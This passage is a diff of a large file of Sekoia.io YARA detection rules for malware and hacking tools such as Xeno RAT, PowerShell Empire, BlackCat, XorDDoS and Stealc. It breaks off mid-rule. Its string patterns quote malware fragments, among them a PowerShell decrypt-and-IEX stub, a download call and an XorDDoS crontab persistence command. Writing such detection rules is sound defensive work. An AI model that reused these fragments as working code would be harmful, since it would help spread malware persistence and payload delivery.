-		logic_hash = "1d715b0962ba9ecbe11649ea85870a8f884f6dd7eda27b1f8eff0d7f5de8c765"
+		logic_hash = "90b3548cd3f4f7f936da70ec95dbe0ff3c1421d40a6e8557952d28d358b7c1f1"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 76
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Yasso/cmd.setting"
-		$ = "Yasso/cmd.Client"
-		$ = "Yasso/cmd.IdentifyResult"
-		$ = "Yasso/cmd.RespLab"
-		$ = "Go build ID"
+		$sleep = "Start-Sleep -Seconds $(($PI -as [Int])*2)" wide ascii nocase
+		$down = "wc.DownloadData" wide ascii nocase
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 15MB and filesize < 20MB and all of them
+		$down in ( @sleep .. @sleep + 1000 )
 }
-rule SEKOIA_Rat_Win_Xeno_Rat : FILE
+rule SEKOIA_Crime_Sload_Scheduledtask_Dropper_Strings
 {
 	meta:
-		description = "Xeno RAT is an open-source RAT, used by Kimsuky in January 2024"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "4be1ff07-8180-42a8-9f51-b5e17bf23442"
-		date = "2024-02-09"
+		id = "01c51da8-71a5-449f-a609-933c37bc2e63"
+		date = "2022-08-02"
 		modified = "2024-12-19"
-		reference = "https://github.com/moom825/xeno-rat/tree/main/xeno%20rat%20client"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_xeno_rat.yar#L1-L17"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crime_sload_scheduledtask_dropper_strings.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "252dd8b236ce3570b6df504d307d88ee7431c0eee361813f1d4f8a66ef1db703"
+		logic_hash = "3a48009933d1de47314ec15c262375636574a7565016eab3792106fa2c0ba79f"
 		score = 75
-		quality = 80
+		quality = 78
+		tags = ""
+		version = "1.0"
+		classification = "TLP:CLEAR"
+
+	strings:
+		$ = "$hh='hi'+'dd'+'en';"
+		$ = { 7D 65 6C 73 65 7B 0A 24 72 73 3D 30 3B 0A 7D 0A }
+		$ = { 6B 69 6C 6C 20 2D 6E 61 6D 65 20 2A 77 65 72 73 68 65 6C 2A }
+
+	condition:
+		all of them
+}
+rule SEKOIA_Backdoor_Powershellempire_Gen : FILE
+{
+	meta:
+		description = "Detects EmpirePowershell"
+		author = "Sekoia.io"
+		id = "36050a5b-bdca-45cd-8e26-7129fdcbf1e8"
+		date = "2022-04-15"
+		modified = "2024-12-19"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_powershellempire_gen.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
+		logic_hash = "21f255bcfb6da2aa996ed61ff5fb29a9355de6169095f7c3141a1b7f3cea5c2d"
+		score = 75
+		quality = 76
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Xeno-manager" wide
-		$ = "moom825"
+		$ = "%{$J=($J+$S[$_]+$K[$_%$K.COUNt])%256;" nocase wide ascii
+		$ = "($IV+$K))|IEX" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of them and filesize < 1MB
 }
-rule SEKOIA_Apt_Kimsuky_Powershell_Dropper_Strings : FILE
+rule SEKOIA_Malware_Valleyrat_Strings_Config : FILE
 {
 	meta:
-		description = "Detects a PowerShell dropper used by Kimsuky"
+		description = "ValleyRAT strings based on HIVE KEYS and config. "
 		author = "Sekoia.io"
-		id = "8b346e05-215b-46c0-82bf-fce3a65440f3"
-		date = "2024-06-11"
+		id = "bb186ab7-60cd-487e-8b9c-c2ff8f121454"
+		date = "2024-08-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_powershell_dropper_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_valleyrat_strings_config.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e98f23ddf02049126786e9300e7b6661b2a74817b36e2f3a661b07b24ef4402d"
+		hash = "b1887a48e59ac7b1b1742854d2a228af"
+		hash = "f6c69e83ce61aacacfbc410345008268"
+		hash = "63ad42e03aca6ce447fb447e21aeb385"
+		hash = "e1d41e5fdfebf8062911ef3c3853b807"
+		hash = "e6cafb4136a9438227086a5826eafe10"
+		hash = "54ba4bbeacd1521164a40e92262b15f6"
+		logic_hash = "89a3d3ca32f9c57e932686f0ed03821350770f82e598948ed86414e231e27a30"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -254025,64 +254049,51 @@ rule SEKOIA_Apt_Kimsuky_Powershell_Dropper_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "try { " ascii wide
-		$s2 = "); } catch(e){} } if ("
-		$s3 = "WScript.Sleep("
-		$s4 = " } catch(e) { }"
+		$key1 = "IpDateInfo" ascii fullword
+		$key2 = "IpDate" ascii fullword
+		$key3 = "SelfPath" ascii fullword
+		$config1 = {7c 00 69 00 3a 00 }
+		$config2 = {7c 00 70 00 3a 00 }
 
 	condition:
-		filesize > 500KB and $s1 at 0 and $s2 in ( filesize -1000 .. filesize ) and $s3 in ( filesize -1000 .. filesize ) and $s4 in ( filesize -1000 .. filesize )
+		uint16be( 0 ) == 0x4d5a and 1 of ( $key* ) and $config2 in ( @config1 .. @config1 + 100 ) and filesize > 300KB and filesize < 100MB
 }
-rule SEKOIA_Crime_Sload_Mainpowershellimplant : FILE
+rule SEKOIA_Win_Clipper_Generic : FILE
 {
 	meta:
-		description = "Detects the main PowerShell implant"
+		description = "Clipper found during investigation: 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6"
 		author = "Sekoia.io"
-		id = "09d268e7-d688-4390-856e-9e9ed47aec04"
-		date = "2022-08-03"
+		id = "a94b3d01-dbc7-41e4-8d45-793bf443b1d2"
+		date = "2024-07-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crime_sload_mainpowershellimplant.yar#L1-L31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/win_clipper_generic.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "37ec263dddf7719d03a3d58b4b196597737a1e28f8072f3933cdf954f2b696cd"
+		logic_hash = "f2fb2285adb10269aaf3d028d3803775ad86833b36cf24dabb8d404a6380b505"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$c1 = "priority FOREGROUND"
-		$c2 = "app|Services|RuntimeBroker|Search|host"
-		$c3 = "([wmiclass]\"win32_Process\").create("
-		$c4 = "Start-Sleep -seconds"
-		$c5 = "while($e -eq 1){ $dCnt++;"
-		$d1 = "112,114,105,111,114,105,116,121,32,70,79,82,69,71,82,79,85,78,68"
-		$d2 = "97,112,112,124,83,101,114,118,105,99,101,115,124,82,117,110,116,105,109,101,66,114,111,107,101,114,124,83,101,97,114,99,104,124,104,111,115,116"
-		$d3 = "40,91,119,109,105,99,108,97,115,115,93,34,119,105,110,51,50,95,80,114,111,99,101,115,115,34,41,46,99,114,101,97,116,101,40"
-		$d4 = "83,116,97,114,116,45,83,108,101,101,112,32,45,115,101,99,111,110,100,115"
-		$d5 = "119,104,105,108,101,40,36,101,32,45,101,113,32,49,41,123,32,36,100,67,110,116,43,43,59"
-		$b1 = "priority FOREGROUND" base64
-		$b2 = "app|Services|RuntimeBroker|Search|host" base64
-		$b3 = "([wmiclass]\"win32_Process\").create(" base64
-		$b4 = "Start-Sleep -seconds" base64
-		$b5 = "while($e -eq 1){ $dCnt++;" base64
+		$s = { 24 72 61 6e 70 74 68 20 3d 20 69 66 20 28 28 47 65 74 2d 52 61 6e 64 6f 6d 29 20 25 20 32 29 20 7b 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 54 45 4d 50 20 22 24 72 61 6e 2e 70 73 31 22 20 7d 20 65 6c 73 65 20 7b 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 41 50 50 44 41 54 41 20 22 24 72 61 6e 2e 70 73 31 22 20 7d  }
 
 	condition:
-		3 of ( $c* ) or 3 of ( $d* ) or 3 of ( $b* ) and filesize < 30KB
+		filesize > 1KB and all of them
 }
-rule SEKOIA_Bot_Lin_Xorddos_Strings : FILE
+rule SEKOIA_Rat_Win_Hiddenz : FILE
 {
 	meta:
-		description = "Catch XORDDoS strings"
+		description = "Lazy rule to detect Hiddenz's HVNC sample based on te malware name contained in numerous samples"
 		author = "Sekoia.io"
-		id = "2f5c70a3-fe3f-4091-905d-d779bd0cb2cd"
-		date = "2023-11-02"
+		id = "4e582cda-4c50-4554-8e26-9d26206a02ee"
+		date = "2022-08-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/bot_lin_xorddos_strings.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_hiddenz.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b91cfeeaddffe98ac1649c5d88a2091cf7ab8ff65b232f09c323d23684cb2a2d"
+		logic_hash = "92f62c893d8a081cd52deaaac93d622fbb1c8e9c7df214e34c6b8066be72a424"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -254090,25 +254101,26 @@ rule SEKOIA_Bot_Lin_Xorddos_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)" ascii fullword
-		$s2 = "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab" ascii fullword
-		$s3 = "for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done"
+		$name0 = "Hiddenz's HVNC" wide ascii
+		$name1 = "Hiddenzs_HVNC_DLL" wide ascii
+		$name2 = "HiddenzHVNC" wide ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 600KB and filesize < 700KB and 3 of them
+		uint16( 0 ) == 0x5A4D and 1 of ( $name* )
 }
-rule SEKOIA_Tool_Efspotato : FILE
+
+rule SEKOIA_Yara_Runascs : FILE
 {
 	meta:
 		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "4440ea37-d7d0-4107-867c-576c6e2f4f7e"
+		id = "1720f042-2cc6-4ef1-b66c-fe8a4214366a"
 		date = "2023-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_efspotato.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/yara_runascs.yar#L3-L33"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "cbfd72a16f02903b1ad6fdf3e25f6c5508145d6be4c1776bb77f1ccd6c1954b3"
+		logic_hash = "fe9b02704d07b5ebe6ad94283e4c1ec2846a54f5c1fb2115a1f6411cf8c19059"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -254116,83 +254128,102 @@ rule SEKOIA_Tool_Efspotato : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "usage: EfsPotato <cmd> [pipe]" ascii wide
-		$s2 = "Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability)." ascii wide
-		$s3 = "Part of GMH's fuck Tools, Code By zcgonvh." ascii wide
+		$s1 = "RunasCs" ascii wide
+		$s2 = "LOGON32_LOGON_INTERACTIVE" ascii wide
+		$s3 = "LOGON32_LOGON_NETWORK" ascii wide
+		$s4 = "LOGON32_LOGON_BATCH" ascii wide
+		$s5 = "LOGON32_LOGON_SERVICE" ascii wide
+		$s6 = "dwLogonProvider" ascii wide
+		$s7 = "LogonUser" ascii wide
+		$s8 = "CreateProcessAsUser" ascii wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them and not ( pe.version_info [ "OriginalFilename" ] == "Atera.AgentPackages.CommonLib.dll" and for any sig in pe.signatures : ( sig.subject contains "CN=Atera Networks Ltd" and sig.issuer contains "CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" ) )
 }
-rule SEKOIA_Hacktool_Ligolo_Relay_Strings : FILE
+rule SEKOIA_Ransomware_Win_Blackcat : FILE
 {
 	meta:
-		description = "Detects Ligolo Relay based on strings"
+		description = "Detect the BlackCat ransomware (Windows version)"
 		author = "Sekoia.io"
-		id = "1e32f2e5-b66b-4b55-9dd4-1402b2f627ed"
-		date = "2022-02-08"
+		id = "873355f7-3942-4171-9df7-f524bb6b6903"
+		date = "2022-01-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_ligolo_relay_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_blackcat.yar#L1-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "57150b394cc7af9ae786b63d83acc29529fa037f0a52afde0e12a2eef93bf6c8"
+		logic_hash = "8a60fd14835f9e8683c3e60a19f23bc00020ccd22e74bffbc8ed19fcb8d0e39a"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.0"
 		classification = "TLP:CLEAR"
+		version = "1.1"
 
 	strings:
-		$ = "ligolo/cmd/localrelay"
-		$ = "main.LigoloRelay.Start"
-		$ = "main.LigoloRelay.startRelayHandler"
-		$ = "main.LigoloRelay.startLocalHandler"
+		$s1 = "desktop_image::set_desktop_wallpaper=" ascii
+		$s2 = "C:\\Users\\Public\\All Usersdeploy_note_and_image_for_all_users=" ascii
+		$s3 = "propagate::none" ascii
+		$s4 = "propagate::failed=" ascii
+		$s5 = "propagate::ok=" ascii
+		$s6 = "query_status_process::ok=" ascii
+		$s7 = "enum_dependent_services::ok=" ascii
+		$s8 = "enum_dependent_services::error=" ascii
+		$s9 = "try_stop=" ascii
+		$s10 = "try_stop::ok=" ascii
+		$s11 = "try_stop::failed=" ascii
+		$s12 = "stop=" ascii
+		$s13 = "dependent_service_name=" ascii
+		$s14 = "kill_all=" ascii
+		$s15 = "detach=" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 2MB and filesize < 5MB and 3 of them
+		uint16( 0 ) == 0x5A4D and filesize > 2MB and filesize < 4MB and all of them
 }
-rule SEKOIA_Clipper_Win_Atlas_Strings
+rule SEKOIA_Implant_Lin_Lightning : FILE
 {
 	meta:
-		description = "Detects Atlas Clipper"
+		description = "Detect the Lightning framework (Core & Downloader plugin)"
 		author = "Sekoia.io"
-		id = "f08c6af6-c325-4f7d-8686-575b25550d6a"
-		date = "2023-07-10"
+		id = "56f53e89-3b63-4ce7-a3c8-da0ba37246f1"
+		date = "2022-07-21"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/clipper_win_atlas_strings.yar#L1-L22"
+		reference = "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_lin_lightning.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c8ad062b69dfe996a488ee9c79f0e7e0016f57f5b54fc39aeb4e207d2a42aa75"
+		logic_hash = "215eea8275fa69a901f6413b334d2824086098e9a9bb2cffd7cb9df5c869be4c"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "C:/Users/box/Desktop/ATLAS/ATLAS/main.go" ascii
-		$s2 = "ATLAS Clipper" ascii
-		$s3 = "Victim: %s" ascii
-		$s4 = "Attacker: %s" ascii
-		$s5 = "Install Path: %s" ascii
-		$s6 = "HWID: %s" ascii
-		$s7 = "Install Date: %s" ascii
-		$s8 = "https://t.me/atlasclipper_channel" ascii
+		$ = "{\"ComputerName\":\"%s\",\"Guid\":\"%s\",\"RequestName\":\"%s\",\"Licence\":\"%s\"}"
+		$ = "kill -9 %s"
+		$ = "{%08X-%04X-%04X-%04X-%04X%04X%04X}"
+		$ = "sleep 60 && ./%s &"
+		$ = "cat /sys/class/net/%s/address"
+		$ = "/usr/bin/netstat"
+		$ = "/usr/bin/whoami"
+		$ = "/usr/bin/su"
+		$ = "dup2: %s"
+		$ = "Linux.Plugin.Kernel_%s"
+		$ = "Lightning"
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x464c457f and 9 of them
 }
-rule SEKOIA_Apt_Tortoiseshell_Wateringhole_Script : FILE
+rule SEKOIA_Apt_Badmagic_Listfiles_Pshscript : FILE
 {
 	meta:
-		description = "Detect's Tortoiseshell WH script"
+		description = "Detects BadMagic ListFiles powershell script"
 		author = "Sekoia.io"
-		id = "58c5ae66-fe09-497c-80bf-20feee4d95e7"
-		date = "2023-05-24"
+		id = "55f1c409-234e-4feb-91a3-9bf5c41ec2b8"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_tortoiseshell_wateringhole_script.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_listfiles_pshscript.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8ad886443b1bd17048054b57650d38cda1ffccc10fedfac86283a41daf956dc2"
+		logic_hash = "4401d31e4b0484776aab51c161a301fc4ee3e944a1669df763bd274014178368"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -254200,56 +254231,51 @@ rule SEKOIA_Apt_Tortoiseshell_Wateringhole_Script : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "btoa(pluggin.toString())"
-		$ = "btoa(document.referrer)"
-		$ = "pluggin.push(navigator.plugins[i]"
-		$ = "navigator.language"
-		$ = "window.RTCPeerConnection"
-		$ = "sha256(canvas.toDataURL("
-		$ = "canvas.getContext('2d"
-		$ = "noop = function() {},"
+		$ = "$env:USERPROFILE"
+		$ = "-Include *.jpg, *.odt, *.doc, *.docx"
 
 	condition:
-		5 of them and filesize < 10000
+		all of them and filesize < 1KB
 }
-rule SEKOIA_Tool_Juicypotatong_Strings : FILE
+rule SEKOIA_Apt_Muddywater_Powershell_Reverse_Secure_Proxy
 {
 	meta:
-		description = "Detects JuicyPotatoNG"
+		description = "Detects PowerShell Reverse Secure Proxy"
 		author = "Sekoia.io"
-		id = "4634251b-ea41-4f58-aabd-db83ccf4edaa"
-		date = "2023-06-20"
+		id = "b255f327-cb56-41b7-82f7-83ee23f791a5"
+		date = "2023-11-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_juicypotatong_strings.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_powershell_reverse_secure_proxy.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "7014b206b293c8254304d97bec7b367c6039566f60511a51d4a41d3e1ed98612"
+		logic_hash = "6507bc030d60af5559492bbb02bc619646306ab06c9bd9d3f78ae6ce55307bda"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[!] CryptStringToBinaryW failed with error code %d" ascii
-		$ = "-b : Bruteforce all CLSIDs. !ALERT:" ascii
-		$ = "[-] CreateProcessWithTokenW Failed to create proc: %d" ascii
+		$ = "$CS.Read($buff,4,2) | Out-Null" ascii wide
+		$ = "$DP = $buff[2]*256 + $buff[3]" ascii wide
+		$ = "$PS3.BeginInvoke() | Out-Null" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		all of them
 }
-rule SEKOIA_Apt_Turla_Kazuar_Variant_2023 : FILE
+
+rule SEKOIA_Backdoor_Win_Minibus : FILE
 {
 	meta:
-		description = "New variant of Kazuar observed in 2023"
+		description = "Detect the MINIBUS backdoor used by UNC1549 since August 2023"
 		author = "Sekoia.io"
-		id = "51e9de6a-5d8a-4627-8063-b70f78e78726"
-		date = "2023-11-03"
+		id = "f88bcf15-9a9f-4d84-adc6-db1db55fe93c"
+		date = "2024-02-29"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_turla_kazuar_variant_2023.yar#L1-L17"
+		reference = "https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_minibus.yar#L4-L41"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "98207fef906c922ff09f72b0dea7103c0fb86c5ec4712a23ecba6840b79b0ad5"
+		logic_hash = "57dabcc15c84c4497b3561f19a7e464fb0dfe93576f4caea88c7cd8534cb4bfd"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -254257,242 +254283,218 @@ rule SEKOIA_Apt_Turla_Kazuar_Variant_2023 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Started from file '" ascii wide
-		$s2 = "Zombifying user's" ascii wide
-		$s3 = "Result #{0:X16} already exists in {1}" ascii wide
+		$dll_150_1 = "TorvaldsPersist.dll"
+		$dll_150_2 = "FileCoAuth.exe"
+		$dll_50_1 = "TorvaldInitial.dll"
+		$dll_50_2 = "\\essential.dat"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		( uint16( 0 ) == 0x5A4D and all of ( $dll_150_* ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "2cf9797b1cfb5795d0fb892b7c371d506a5dd8b7c64fdc82975b3fde6d997df0" ) ) or ( uint16( 0 ) == 0x5A4D and all of ( $dll_50_* ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "de3fb5d4419eb6b943872dd6e3dd93d19584ef2b158aa3158b3b09f0a9b628ef" ) )
 }
-rule SEKOIA_Apt_Susp_Apt28_Uac0063_Malicious_Doc_Settings_Xml : FILE
+rule SEKOIA_Apt_Backdoordiplomaty_Phantomnet : FILE
 {
 	meta:
-		description = "Detects some suspected APT28 document settings.xml"
+		description = "Detects PhantomNet based on strings"
 		author = "Sekoia.io"
-		id = "fd104985-6441-4fb6-8cc1-30afa4a7797b"
-		date = "2024-07-25"
+		id = "bbcc0664-ef2b-47db-a546-b5e0aa2a1e9a"
+		date = "2024-06-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_susp_apt28_uac0063_malicious_doc_settings_xml.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_backdoordiplomaty_phantomnet.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "0272acc6ed17c72320e4e7b0f5d449841d0ccab4ea89f48fd69d0a292cc5d39a"
-		logic_hash = "29b40a83340e71bfc38dc7050b3a21e62e2d2e506dbd077c1c7e430c8ff56d32"
-		score = 65
-		quality = 30
+		logic_hash = "e4be9b9e092dcaa368650b7f696ca532f89752bdbe6b5fd09b4285a643c20b86"
+		score = 75
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "http://schemas.openxmlformats.org/" ascii fullword
-		$ = "Call svc.GetFolder(" ascii fullword
-		$ = "CreateTextFile(appdir" ascii fullword
-		$ = "Sub Document_Open() : On Error Resume Next" ascii fullword
+		$ = "memory load plugin failed!" wide
+		$ = "Event eee!!!" ascii
+		$ = "LoadWin32_x64.pdb" ascii
 
 	condition:
-		2 of them and filesize < 1MB
+		uint16be( 0 ) == 0x4d5a and filesize < 2MB and 2 of them
 }
-rule SEKOIA_Infostealer_Win_Stealc : FILE
+
+rule SEKOIA_Loader_Win_Svcready_Imports : FILE
 {
 	meta:
-		description = "Find standalone Stealc sample based on decryption routine or characteristic strings"
+		description = "Finds samples of the SVCReady loader"
 		author = "Sekoia.io"
-		id = "aa78772e-9b31-40f3-84f4-b8302ea63a28"
-		date = "2023-02-12"
+		id = "e89aa736-acee-4881-b367-a9abfe9784ec"
+		date = "2022-06-08"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_stealc.yar#L1-L23"
+		reference = "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_svcready_imports.yar#L3-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "60140c5a97494e6648dfce719ebce5644a3e05d4559d28874eb759b7d0e6a90e"
+		logic_hash = "f210c5363d19dbc822b8476f8ecfd86184af8f1c36819a6c868f171152e7cb74"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$dec = { 55 8b ec 8b 4d ?? 83 ec 0c 56 57 e8 ?? ?? ?? ?? 6a 03 33 d2 8b f8 59 f7 f1 8b c7 85 d2 74 04 }
-		$str01 = "------" ascii
-		$str02 = "Network Info:" ascii
-		$str03 = "- IP: IP?" ascii
-		$str04 = "- Country: ISO?" ascii
-		$str05 = "- Display Resolution:" ascii
-		$str06 = "User Agents:" ascii
-		$str07 = "%s\\%s\\%s" ascii
+		$str0 = "Svc:RunPEDllNative" ascii
+		$str1 = "RunPEDllNative::" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $dec or 5 of ( $str* ) )
+		uint16( 0 ) == 0x5A4D and filesize > 200KB and filesize < 2MB and pe.imports ( "GDI32.dll" , "Ellipse" ) and pe.imports ( "GDI32.dll" , "SelectObject" ) and pe.imports ( "GDI32.dll" , "GetStockObject" ) and pe.imports ( "GDI32.dll" ) == 3 and all of them
 }
-rule SEKOIA_Tool_Sharpnbtscan_Strings : FILE
+rule SEKOIA_Ursnif_Ldr4
 {
 	meta:
-		description = "Detects SharpNBTScan based on strings"
+		description = "Ursnif LDR4"
 		author = "Sekoia.io"
